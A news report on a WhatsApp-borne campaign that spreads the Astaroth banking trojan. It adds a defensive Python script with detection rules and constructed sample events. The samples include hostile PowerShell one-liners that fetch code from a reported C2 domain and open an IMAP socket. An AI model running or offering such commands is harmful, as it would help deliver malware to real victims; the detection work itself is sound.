
Researchers at Sophos report that they have discovered a new, large-scale malware distribution campaign spreading through WhatsApp (owned by Meta, which is recognized as extremist and banned in Russia). Tracked as STAC3150, the campaign has been active since September 24, 2025 and has already claimed more than 250 victims. Analysts believe the attackers are continuously refining their tools and swapping out infrastructure in near real time.

The attack begins with a phishing message written in Portuguese. The recipient is invited to open an attached document that can supposedly be viewed only once. In reality the attachment is a ZIP archive containing a malicious VBS or HTA file. Once run, the script launches PowerShell, which downloads additional malicious components.

In late September the payloads reached the attackers' servers in an unusual way: over IMAP, fetching the second stage of the infection from mailboxes controlled by the attackers. By early October the method had changed: downloads moved to HTTP, with traffic going to the C2 server varegjopeaks[.]com.

Next, PowerShell or Python scripts built to hijack WhatsApp Web sessions automatically are deployed. Sophos reports that the criminals use Selenium WebDriver and the WPPConnect library. This lets them steal session tokens, harvest the victim's contact list, and automatically forward the infected ZIP files to new targets, which accelerates the campaign's spread.

By the end of October the operation had become more sophisticated still: an MSI installer appeared that deploys the known banking trojan Astaroth (Guildma). The installer writes several components to the machine, establishes persistence via autorun, and launches a malicious AutoIt script disguised as an ordinary .log file. Its C2 server is manoelimoveiscaioba[.]com. According to Sophos, the majority of infections are among users in Brazil.
Analysts note that the campaign is evolving rapidly, and the attackers’ approaches are constantly changing.
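The chain described above (script from a ZIP attachment, script host spawning PowerShell, IMAP and later HTTP retrieval of the next stage, an MSI dropping an AutoIt interpreter that runs a .log file) gives a defender several distinct, low-noise hunting points. The following Python sketch is an added example, not Sophos's tooling or detection content: it runs simple rules over constructed, simplified Sysmon-style process and network events. The two C2 domains are the ones named in the report (undefanged for matching); the user paths, the IMAP host, the installer and AutoIt file names, and the event field names are assumptions made for the sample.

```python
"""Hunting rules for the STAC3150-style kill chain (added example, constructed data)."""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Domains named in the Sophos report, written defanged in the article.
C2_DOMAINS = {"varegjopeaks.com", "manoelimoveiscaioba.com"}


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str   # parent process image path or name
    image: str          # process image path or name
    cmdline: str        # full command line
    dest: str = ""      # destination host:port of a network event, if any


def _base(image: str) -> str:
    """Lower-cased file name of an image path."""
    return image.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    img, parent = _base(ev.image), _base(ev.parent_image)
    text = ev.cmdline.lower() + " " + ev.dest.lower()

    # Stage 1: a VBS/HTA run by a script host straight out of a ZIP extraction path.
    if img in SCRIPT_HOSTS and re.search(r"\.(vbs|hta)\b", text) and ".zip" in text:
        hits.append("script_from_archive")
    # Stage 2: PowerShell whose parent is a script host.
    if img == "powershell.exe" and parent in SCRIPT_HOSTS:
        hits.append("scripthost_spawns_powershell")
    # Late-September variant: PowerShell talking IMAP (port 993/143 or an imap host).
    if img == "powershell.exe" and re.search(r"\bimap\b|:993\b|:143\b", text):
        hits.append("powershell_imap_c2")
    # October variant: traffic to a reported C2 domain, regardless of process.
    if any(d in text for d in C2_DOMAINS):
        hits.append("known_c2_domain")
    # Astaroth stage: the AutoIt interpreter handed a script disguised as a .log file.
    if img == "autoit3.exe" and re.search(r"\.log\b", text):
        hits.append("autoit_runs_log_file")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """(index, matched rules) for every event that matched at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]


def kill_chain_score(events: list[ProcEvent]) -> int:
    """Number of distinct stages seen; several distinct stages on one host is a strong signal."""
    return len({rule for _, hits in scan(events) for rule in hits})


# Constructed sample telemetry for one host (paths, hosts and file names are made up).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\AppData\Local\Temp\Temp1_documento.zip\documento.vbs"'),
    ProcEvent(r"C:\Windows\System32\wscript.exe", "powershell.exe",
              'powershell.exe -nop -w hidden -ep bypass -c "iex (gc $env:TEMP\\stage.txt)"'),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -c \"New-Object System.Net.Sockets.TcpClient('imap.example.net', 993)\"",
              dest="imap.example.net:993"),
    ProcEvent("powershell.exe", "powershell.exe",
              "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://varegjopeaks.com/')\"",
              dest="varegjopeaks.com:80"),
    ProcEvent(r"C:\Windows\explorer.exe", "msiexec.exe",
              r"msiexec.exe /i C:\Users\ana\Downloads\instalador.msi /qn"),
    ProcEvent("msiexec.exe", r"C:\ProgramData\Atualizacao\AutoIt3.exe",
              r"AutoIt3.exe C:\ProgramData\Atualizacao\sistema.log"),
    ProcEvent(r"C:\Windows\explorer.exe", "powershell.exe",
              r"powershell.exe -c Get-ChildItem C:\Users\ana\Documents"),   # benign admin use
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].cmdline[:60], "->", hits)
    print("distinct stages seen:", kill_chain_score(SAMPLE_EVENTS))
```

Each rule alone is a weak signal (interactive PowerShell and legitimate AutoIt installers exist), so the useful alert is the per-host count of distinct stages, which is what `kill_chain_score` returns; the domain rule is the only one that depends on indicators that the attackers can rotate, which the article notes they do frequently.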